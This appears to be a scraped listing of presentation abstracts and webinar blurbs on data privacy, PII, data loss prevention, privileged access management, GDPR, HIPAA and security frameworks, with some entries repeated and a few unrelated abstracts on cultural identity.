This document discusses personally identifiable information (PII) and provides guidance on managing PII. It defines PII as information that can be used to identify an individual. The document notes that data breaches involving PII are common and outlines legal issues related to PII. It recommends assessing the confidentiality impact of PII and implementing appropriate controls based on the impact level. Specific steps are outlined to help organizations properly manage PII.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
Shariyaz abdeen data leakage prevention presentationShariyaz Abdeen
This document discusses data loss prevention (DLP) systems and solutions. It outlines key challenges in securing confidential data, including identifying where data is stored and located, monitoring where data is going, and enforcing data security policies. The document compares several DLP vendors and their solutions for discovering and protecting data at rest and in motion. It also provides examples of common data security incidents and evaluates risks to prioritize data types for protection. Overall the document promotes DLP systems as an important tool for securing organizations' confidential and regulated data.
Regulatory frameworks like HIPAA, HITECH, and Meaningful Use establish standards for protecting patient health information and incentivizing adoption of electronic health records. Security frameworks such as NIST and ISO provide best practices for information security controls. Recent case studies show common HIPAA violations include unencrypted devices, email phishing, and improper access controls. Current topics in healthcare cybersecurity include implementing the basics of risk assessment, policies, and technical controls; evaluating risks from business partners; and protecting against ransomware through regular patching and backups.
Being aware of the trends that are expected to shape the digital landscape is an important step in ensuring the security of your data and online assets.
Amongst others, the webinar covers:
• Top Cyber Trends for 2023
• Cyber Insurance
• Prioritization of Cyber Risk
Presenters:
Colleen Lennox
Colleen Lennox is the Founder of Cyber Job Central, a newly formed job board dedicated to Cybersecurity job openings. Colleen has 25+ years in Technical Recruiting and loves to help other find their next great job!
Madhu Maganti
Madhu is a goal-oriented cybersecurity/IT advisory leader with more than 20 years of comprehensive experience leading high-performance teams with a proven track record of continuous improvement toward objectives. He is highly knowledgeable in both technical and business principles and processes.
Madhu specializes in cybersecurity risk assessments, enterprise risk management, regulatory compliance, Sarbanes-Oxley (SOX) compliance and system and organization controls (SOC) reporting.
Date: January 25, 2023
Tags: ISO, ISO/IEC 27032, Cybersecurity Management
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27032
https://pecb.com/article/cybersecurity-risk-assessment
https://pecb.com/article/a-deeper-understanding-of-cybersecurity
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/BAAl_PI9uRc
The document discusses information security and its importance. It defines information and information security, and outlines threats like different types of attacks. It explains the three principles of information security - confidentiality, integrity, and availability. It also discusses security across different aspects like data security, computer security and network security. The document emphasizes that information is a valuable asset for organizations that needs suitable protection.
CIA Triad in Data Governance, Information Security, and Privacy: Its Role and...PECB
According to Technavio's latest market research report, the data security market value will grow by $2.85 Billion during 2021-2025.
To secure their data, organizations can use the CIA triad, a data security model developed to help the data security market and people deal with various IT security parts.
The webinar covers
• Overview Of CIA
• Description of Data Governance vs Information Security vs Privacy
• Relationship of CIA to Data Governance
• Relationship of CIA to Information Security
• Relationship of CIA to Privacy
• How to Implement and Maintain the CIA model (e.g., PDCA, etc.)
Presenters:
Anthony English
Our presenter for this webinar is Anthony English, one of the top cybersecurity professionals in Atlantic Canada with extensive Canadian and International experience in cybersecurity covering risk assessment, management, mitigation, security testing, business continuity, information security management systems, architecture security reviews, project security, security awareness, lectures, presentations and standards-based compliance.
Date: November 17, 2021
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
Youtube video: https://youtu.be/eA8uQhdLZpw
Website link: https://pecb.com/
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
Shariyaz abdeen data leakage prevention presentationShariyaz Abdeen
This document discusses data loss prevention (DLP) systems and solutions. It outlines key challenges in securing confidential data, including identifying where data is stored and located, monitoring where data is going, and enforcing data security policies. The document compares several DLP vendors and their solutions for discovering and protecting data at rest and in motion. It also provides examples of common data security incidents and evaluates risks to prioritize data types for protection. Overall the document promotes DLP systems as an important tool for securing organizations' confidential and regulated data.
Regulatory frameworks like HIPAA, HITECH, and Meaningful Use establish standards for protecting patient health information and incentivizing adoption of electronic health records. Security frameworks such as NIST and ISO provide best practices for information security controls. Recent case studies show common HIPAA violations include unencrypted devices, email phishing, and improper access controls. Current topics in healthcare cybersecurity include implementing the basics of risk assessment, policies, and technical controls; evaluating risks from business partners; and protecting against ransomware through regular patching and backups.
Being aware of the trends that are expected to shape the digital landscape is an important step in ensuring the security of your data and online assets.
Amongst others, the webinar covers:
• Top Cyber Trends for 2023
• Cyber Insurance
• Prioritization of Cyber Risk
Presenters:
Colleen Lennox
Colleen Lennox is the Founder of Cyber Job Central, a newly formed job board dedicated to Cybersecurity job openings. Colleen has 25+ years in Technical Recruiting and loves to help other find their next great job!
Madhu Maganti
Madhu is a goal-oriented cybersecurity/IT advisory leader with more than 20 years of comprehensive experience leading high-performance teams with a proven track record of continuous improvement toward objectives. He is highly knowledgeable in both technical and business principles and processes.
Madhu specializes in cybersecurity risk assessments, enterprise risk management, regulatory compliance, Sarbanes-Oxley (SOX) compliance and system and organization controls (SOC) reporting.
Date: January 25, 2023
Tags: ISO, ISO/IEC 27032, Cybersecurity Management
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27032
https://pecb.com/article/cybersecurity-risk-assessment
https://pecb.com/article/a-deeper-understanding-of-cybersecurity
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/BAAl_PI9uRc
The document discusses information security and its importance. It defines information and information security, and outlines threats like different types of attacks. It explains the three principles of information security - confidentiality, integrity, and availability. It also discusses security across different aspects like data security, computer security and network security. The document emphasizes that information is a valuable asset for organizations that needs suitable protection.
CIA Triad in Data Governance, Information Security, and Privacy: Its Role and...PECB
According to Technavio's latest market research report, the data security market value will grow by $2.85 Billion during 2021-2025.
To secure their data, organizations can use the CIA triad, a data security model developed to help the data security market and people deal with various IT security parts.
The webinar covers
• Overview Of CIA
• Description of Data Governance vs Information Security vs Privacy
• Relationship of CIA to Data Governance
• Relationship of CIA to Information Security
• Relationship of CIA to Privacy
• How to Implement and Maintain the CIA model (e.g., PDCA, etc.)
Presenters:
Anthony English
Our presenter for this webinar is Anthony English, one of the top cybersecurity professionals in Atlantic Canada with extensive Canadian and International experience in cybersecurity covering risk assessment, management, mitigation, security testing, business continuity, information security management systems, architecture security reviews, project security, security awareness, lectures, presentations and standards-based compliance.
Date: November 17, 2021
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
Youtube video: https://youtu.be/eA8uQhdLZpw
Website link: https://pecb.com/
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
The document discusses the NIST Cybersecurity Framework, which provides guidelines for critical infrastructure security and management of cybersecurity risks. It was created through a collaboration between government and industry to help organizations manage and reduce cybersecurity risks. The framework consists of five concurrent and continuous functions - Identify, Protect, Detect, Respond, Recover. It also outlines implementation tiers from Partial to Adaptive to help organizations determine their cybersecurity risk management practices. The framework is meant to be flexible and not prescriptive in order to accommodate different sectors and risks profiles.
This document provides an overview and agenda for a Data Loss Prevention presentation. It discusses trends in data loss, how DLP works to discover, monitor and protect data, and case studies of how DLP helps different types of insider and outsider threats. It highlights the advantages of the Symantec DLP solution, including its accuracy, sophisticated workflow for incident response, ability to identify sensitive data with Data Insight, and zero-day content detection through machine learning. The appendix discusses Symantec's leadership in the DLP market and new features of the latest DLP product version.
This document provides an overview of cybersecurity training for Windstone Health Services employees in 2021. It defines cybersecurity and why it is important, discusses common cybersecurity threats like malware, phishing, and denial of service attacks. It also outlines responsibilities for both employees and the company, including maintaining secure passwords, updating software, and employing firewalls and encryption. The overall message is that cyberattacks are a serious risk and all entities must work together to protect systems, be wary of suspicious activities, and keep security protocols up to date.
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Cyber Security Layers - Defense in Depth
7P's, 2D's & 1 N
People
Process
Perimeter
Physical
Points (End)
Network
Platform
Programs (Apps)
Database
Data
This document discusses the importance of protecting sensitive data and minimizing exposure. It defines sensitive data as information that must be safeguarded from unauthorized access, such as passwords, addresses, social security numbers, and credit card information. The document outlines laws and regulations that govern sensitive data protection and explains how data is often exposed through security flaws, intrusions, phishing, or social engineering. It recommends encrypting sensitive data, restricting access to authorized individuals only, and learning from past security incidents to strengthen protections.
This document is a summary of a webinar on cyber security and digital safety. It discusses various types of hackers, defines cyber crimes, and covers topics like social media security, mental health and cyber security, and how to protect websites from hacking. It provides scopes in the cyber security field and lists some dedicated cyber security companies in Nepal. The webinar aims to educate normal users on filing the cyber space safely.
This document discusses various threats to information security and safeguards organizations can implement. The three main sources of threats are human error, malicious human activity, and natural disasters. Some key threats include hacking, viruses, unauthorized data disclosure through actions like phishing. Technical safeguards include identification & authentication like passwords, encryption, firewalls, malware protection. Human safeguards involve policies, training, account management and monitoring. Senior management must establish security policies, assess risks, and ensure all necessary safeguards are in place to protect the organization's information systems and data. The organization should also have an incident response plan to deal with security breaches when they do occur.
This presentation shows customers how IBM Security products and services help clients transform their security program, orchestrate their defenses throughout the attack lifecycle, and protect their most critical information and risks.
Cybersecurity Incident Management Powerpoint Presentation Slides are designed for information technology experts. Our data security PowerPoint theme combines high-quality design with info accumulated by industry experts. Represent the present situation of the target organization’s information security management using our patterned PPT slideshow. The innovative data visualizations aid in compiling data such as the analysis of the current IT department with considerable convenience. Communicate the cybersecurity framework roadmap and kinds of cyber threats with the help of this PowerPoint layout. Demonstrate the cybersecurity risk management action plan through the tabular format included in this PPT presentation. Illustrate the cybersecurity contingency plan. Our information security management system PowerPoint templates deck helps you in defining risk handling responsibilities of your personnel. Elucidate the role of the management in successful information security governance. Our PPT deck also outlines the costs involved in cybersecurity management and staff training. Showcase an impact analysis with a dash of visual brilliance. Smash the download button and start designing. Our Cybersecurity Incident Management Powerpoint Presentation Slides are topically designed to provide an attractive backdrop to any subject. Use them to look like a presentation pro. https://bit.ly/3zWo1hb
The document discusses various security threats that exist on social networks, including phishing attacks, vulnerabilities in third-party applications, weak password security, cross-site scripting attacks, clickjacking, insecure frameworks, SQL injections, and DDOS attacks. It provides examples of each type of attack, such as phishing links that install malware, apps that access too much user data if hacked, passwords being easily guessed, malicious JavaScript that can be installed through photo tags, and privacy settings being exploited to view other profiles. The document emphasizes that with over a billion users exchanging personal information, social networks face many potential threats but that Facebook focuses heavily on security to prevent hacks of its own system.
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Information Security vs. Data Governance vs. Data Protection: What Is the Rea...PECB
This webinar will provide more information on the importance of information security and how you can take security well beyond compliance, an approach on building strong information security, privacy and data governance programs, and the importance of strong data governance in relation to privacy and information security requirements.
The webinar covers
• Information Security
• Importance Of Information Security Today
• Taking Information Security Beyond A Compliance First
• Importance Of Data Governance In Information Security
• Privacy
• Changing And Evolving Privacy Requirements
• Importance Of Data Governance In Privacy
• Data Governance And Data Privacy
• Data Privacy - Data Processing Principles
Presenters:
Moji is a Senior Business Process Analyst working with GemaltoThales, a leading firm in the IT industry. Moji has over fifteen years of experience in leading projects to improve processes, create and implement processes leading to increased revenue generation and eliminate redundancies.
She has a zeal for adding value and increasing revenue for organizations. Moji is very passionate about Data Privacy and its application in business and consumer rights.
Hardeep Mehrotara has 20+ years of senior leadership experience in Information Technology and Cyber Security working for public and private organizations building security programs from the ground up. He has been featured on Canadian television as a cyber expert and provided advice to various communities on implementing cybersecurity strategy, best practices and controls. He has been a co-author on numerous leading industry security control frameworks, technical benchmarks and industry best practice standards.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/aQcS5-RFIEY
Website link: https://pecb.com/
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
All the essential information you need about DLP in one eBook.
As security professionals struggle with how to keep up with threats, DLP - a technology designed to ensure sensitive data isn't stolen or lost - is hot again. This comprehensive guide provides what you need to understand, evaluate, and succeed with today's DLP. It includes insights from DLP Experts, Forrester Research, Gartner, and Digital Guardian's security analysts.
What's Inside:
-The seven trends that have made DLP hot again
-How to determine the right approach for your organization
-Making the business case to executives
-How to build an RFP and evaluate vendors
-How to start with a clearly defined quick win
-Straight-forward frameworks for success
Secrets to managing your Duty of Care in an ever- changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members who may not have the right level of technical security knowledge. This session will outline what practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with its strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
This document provides an overview of network security concepts. It discusses the importance of protecting information assets as the most valuable company assets. It then covers key network security topics like the CIA triad of confidentiality, integrity and availability. It defines threats at both the network and application levels, and discusses how to overcome threats through policies, user awareness training, and security technologies like firewalls, IDS/IPS, antivirus software, VPNs, spam filters and web content filtering. The document aims to educate about network threats and appropriate security controls and protections.
A continuing legal education program on the privacy issues in transactions including credit applications and issuance, asset purchases, mergers and acquisitions, marketing and advertising and bankruptcy, given on May 21, 2013 by Jonathan I. Ezor at Olshan Frome Wolosky in New York City.
Halt & Catch Fire: Is PII No Longer the Third-Rail of Digital Privacy?iMedia Connection
This document discusses personally identifiable information (PII) and how the digital advertising landscape has changed in recent years. It notes that PII rules were established 15 years ago but the market is now very different, with platforms merging PII data with ad serving data and using PII for targeting. It suggests that regulating PII and connecting different data silos, including for internet of things devices, is an important issue. It concludes that advertising technology companies should reconsider how they can appropriately leverage PII given these changes.
The document discusses the NIST Cybersecurity Framework, which provides guidelines for critical infrastructure security and management of cybersecurity risks. It was created through a collaboration between government and industry to help organizations manage and reduce cybersecurity risks. The framework consists of five concurrent and continuous functions - Identify, Protect, Detect, Respond, Recover. It also outlines implementation tiers from Partial to Adaptive to help organizations determine their cybersecurity risk management practices. The framework is meant to be flexible and not prescriptive in order to accommodate different sectors and risks profiles.
This document provides an overview and agenda for a Data Loss Prevention presentation. It discusses trends in data loss, how DLP works to discover, monitor and protect data, and case studies of how DLP helps different types of insider and outsider threats. It highlights the advantages of the Symantec DLP solution, including its accuracy, sophisticated workflow for incident response, ability to identify sensitive data with Data Insight, and zero-day content detection through machine learning. The appendix discusses Symantec's leadership in the DLP market and new features of the latest DLP product version.
This document provides an overview of cybersecurity training for Windstone Health Services employees in 2021. It defines cybersecurity and why it is important, discusses common cybersecurity threats like malware, phishing, and denial of service attacks. It also outlines responsibilities for both employees and the company, including maintaining secure passwords, updating software, and employing firewalls and encryption. The overall message is that cyberattacks are a serious risk and all entities must work together to protect systems, be wary of suspicious activities, and keep security protocols up to date.
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Cyber Security Layers - Defense in Depth
7P's, 2D's & 1 N
People
Process
Perimeter
Physical
Points (End)
Network
Platform
Programs (Apps)
Database
Data
This document discusses the importance of protecting sensitive data and minimizing exposure. It defines sensitive data as information that must be safeguarded from unauthorized access, such as passwords, addresses, social security numbers, and credit card information. The document outlines laws and regulations that govern sensitive data protection and explains how data is often exposed through security flaws, intrusions, phishing, or social engineering. It recommends encrypting sensitive data, restricting access to authorized individuals only, and learning from past security incidents to strengthen protections.
This document is a summary of a webinar on cyber security and digital safety. It discusses various types of hackers, defines cyber crimes, and covers topics like social media security, mental health and cyber security, and how to protect websites from hacking. It provides scopes in the cyber security field and lists some dedicated cyber security companies in Nepal. The webinar aims to educate normal users on filing the cyber space safely.
This document discusses various threats to information security and safeguards organizations can implement. The three main sources of threats are human error, malicious human activity, and natural disasters. Some key threats include hacking, viruses, unauthorized data disclosure through actions like phishing. Technical safeguards include identification & authentication like passwords, encryption, firewalls, malware protection. Human safeguards involve policies, training, account management and monitoring. Senior management must establish security policies, assess risks, and ensure all necessary safeguards are in place to protect the organization's information systems and data. The organization should also have an incident response plan to deal with security breaches when they do occur.
This presentation shows customers how IBM Security products and services help clients transform their security program, orchestrate their defenses throughout the attack lifecycle, and protect their most critical information and risks.
Cybersecurity Incident Management Powerpoint Presentation Slides are designed for information technology experts. Our data security PowerPoint theme combines high-quality design with info accumulated by industry experts. Represent the present situation of the target organization’s information security management using our patterned PPT slideshow. The innovative data visualizations aid in compiling data such as the analysis of the current IT department with considerable convenience. Communicate the cybersecurity framework roadmap and kinds of cyber threats with the help of this PowerPoint layout. Demonstrate the cybersecurity risk management action plan through the tabular format included in this PPT presentation. Illustrate the cybersecurity contingency plan. Our information security management system PowerPoint templates deck helps you in defining risk handling responsibilities of your personnel. Elucidate the role of the management in successful information security governance. Our PPT deck also outlines the costs involved in cybersecurity management and staff training. Showcase an impact analysis with a dash of visual brilliance. Smash the download button and start designing. Our Cybersecurity Incident Management Powerpoint Presentation Slides are topically designed to provide an attractive backdrop to any subject. Use them to look like a presentation pro. https://bit.ly/3zWo1hb
The document discusses various security threats that exist on social networks, including phishing attacks, vulnerabilities in third-party applications, weak password security, cross-site scripting attacks, clickjacking, insecure frameworks, SQL injections, and DDOS attacks. It provides examples of each type of attack, such as phishing links that install malware, apps that access too much user data if hacked, passwords being easily guessed, malicious JavaScript that can be installed through photo tags, and privacy settings being exploited to view other profiles. The document emphasizes that with over a billion users exchanging personal information, social networks face many potential threats but that Facebook focuses heavily on security to prevent hacks of its own system.
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Information Security vs. Data Governance vs. Data Protection: What Is the Rea...PECB
This webinar will provide more information on the importance of information security and how you can take security well beyond compliance, an approach on building strong information security, privacy and data governance programs, and the importance of strong data governance in relation to privacy and information security requirements.
The webinar covers
• Information Security
• Importance Of Information Security Today
• Taking Information Security Beyond A Compliance First
• Importance Of Data Governance In Information Security
• Privacy
• Changing And Evolving Privacy Requirements
• Importance Of Data Governance In Privacy
• Data Governance And Data Privacy
• Data Privacy - Data Processing Principles
Presenters:
Moji is a Senior Business Process Analyst working with GemaltoThales, a leading firm in the IT industry. Moji has over fifteen years of experience in leading projects to improve processes, create and implement processes leading to increased revenue generation and eliminate redundancies.
She has a zeal for adding value and increasing revenue for organizations. Moji is very passionate about Data Privacy and its application in business and consumer rights.
Hardeep Mehrotara has 20+ years of senior leadership experience in Information Technology and Cyber Security working for public and private organizations building security programs from the ground up. He has been featured on Canadian television as a cyber expert and provided advice to various communities on implementing cybersecurity strategy, best practices and controls. He has been a co-author on numerous leading industry security control frameworks, technical benchmarks and industry best practice standards.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/aQcS5-RFIEY
Website link: https://pecb.com/
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
All the essential information you need about DLP in one eBook.
As security professionals struggle with how to keep up with threats, DLP - a technology designed to ensure sensitive data isn't stolen or lost - is hot again. This comprehensive guide provides what you need to understand, evaluate, and succeed with today's DLP. It includes insights from DLP Experts, Forrester Research, Gartner, and Digital Guardian's security analysts.
What's Inside:
-The seven trends that have made DLP hot again
-How to determine the right approach for your organization
-Making the business case to executives
-How to build an RFP and evaluate vendors
-How to start with a clearly defined quick win
-Straight-forward frameworks for success
Secrets to managing your Duty of Care in an ever- changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members who may not have the right level of technical security knowledge. This session will outline what practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with its strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
This document provides an overview of network security concepts. It discusses the importance of protecting information assets as the most valuable company assets. It then covers key network security topics like the CIA triad of confidentiality, integrity and availability. It defines threats at both the network and application levels, and discusses how to overcome threats through policies, user awareness training, and security technologies like firewalls, IDS/IPS, antivirus software, VPNs, spam filters and web content filtering. The document aims to educate about network threats and appropriate security controls and protections.
A continuing legal education program on the privacy issues in transactions including credit applications and issuance, asset purchases, mergers and acquisitions, marketing and advertising and bankruptcy, given on May 21, 2013 by Jonathan I. Ezor at Olshan Frome Wolosky in New York City.
Halt & Catch Fire: Is PII No Longer the Third-Rail of Digital Privacy?iMedia Connection
This document discusses personally identifiable information (PII) and how the digital advertising landscape has changed in recent years. It notes that PII rules were established 15 years ago but the market is now very different, with platforms merging PII data with ad serving data and using PII for targeting. It suggests that regulating PII and connecting different data silos, including for internet of things devices, is an important issue. It concludes that advertising technology companies should reconsider how they can appropriately leverage PII given these changes.
The document discusses various definitions of identity and how identity is formed and influenced. It addresses the nature vs nurture debate on whether identity is innate or acquired. Key points made include:
- Identity can refer to characteristics that define one as a member of a group, the quality of being the same as something else, or one's individual personality.
- Young people's identities are influenced by the media images they are exposed to through technology like TVs and the internet. This exposure can shape their behavior, interests and sense of self.
- Identity is complex, personal yet relates to broader groups, and can change based on one's circumstances. It is fluid and affected by broader social changes.
The document provides an overview of an upcoming presentation on the General Data Protection Regulation (GDPR). It begins with introductions and disclaimers from the presenter and VMware. It then outlines the areas that will be covered in the 30 minute presentation, including timeframes for GDPR compliance, key changes from the previous Data Protection Directive, myths about GDPR requirements, potential fines, and VMware products that can help with GDPR compliance.
This document discusses various theories around identity and representation. It explores how identity is constructed through systems of representation rather than reflecting an inherent reality. Representation is shown to produce meanings and understandings of the world rather than being a neutral reflection. Different artists are discussed who investigate ideas of fluid and performed identity, including Cindy Sherman who adopts various roles to show how identity is constructed. The male gaze and objectification of the female body are also examined as ways that representation can shape understandings of gender and sexuality.
Identity and access management (IAM) involves managing user accounts, access to systems and applications, and user lifecycles. It encompasses provisioning, managing, and removing access when employees join, change roles, or leave an organization. IAM aims to streamline access management, improve security and compliance, and integrate user data across different systems using standards like LDAP, RBAC, SSO and federation. Successful IAM requires aligning technical solutions with business processes, change management, and ongoing auditing to ensure appropriate access controls.
Geek Sync | Tackling Key GDPR Challenges with Data Modeling and GovernanceIDERA Software
You can watch the replay for this Geek Sync webcast in the IDERA Resource Center: http://ow.ly/tLtr50A5b4b
The General Data Protection Regulation (GDPR) is inevitable and goes live in the EU beginning May 25th 2018. It touches all technical and organizational measures as well as the design of internal systems and processes, and affects all companies around the world that have customers in the EU.
Join IDERA and Dr. Sultan Shiffa as he focuses on how data modeling, governance and collaboration help Executives, IT Managers, Architects, DBAs and Developers tackle the key challenges around data protection by design and by default, individual rights to access and erasure, valid consent, data protection roles and accountabilities, data breach notifications, and auditing the records of data processing activities. This session will also explore best practices and examples for how to master those challenges and assess the data protection impact. After this session, you can be prepared to become GDPR compliant ahead of the deadline and beyond.
The document provides an overview and agenda for a conference on achieving compliance with the General Data Protection Regulation (GDPR). It discusses key aspects of GDPR compliance including identifying personal data, data subject rights, security requirements, international data transfers, and remedies for non-compliance. Various vendors also present on how their products can help organizations meet GDPR requirements through features such as digital consent management and customizable reporting on personal data. An example case study highlights how one company used DocuSign to address challenges around manual processes, GDPR readiness, and security of personal information.
The document discusses social and cultural identities. It defines identity as a self-image derived from socialization, and cultural identity as symbolic behaviors meaningful to a group. Some key identities discussed are racial, ethnic, gender, national, regional, organizational, and personal identities. It also covers cyber/fantasy identities and the dark side of identities such as stereotyping, prejudice, and ethnocentrism.
This document provides an overview of the costs associated with data breaches. It begins by introducing the speakers and the agenda. It then discusses what constitutes a data breach and the types of data that may be exposed, such as PII, PHI, intellectual property, and financial information. The document explores the various direct and indirect costs of a breach for different entities. It provides examples of cost estimates from past breaches, which range from thousands to over $170 million depending on the size and type of breach. Patterns in breach cost data are examined, though correlations are weak. Overall, the document deconstructs the complexities involved in understanding and estimating the full costs of a data breach.
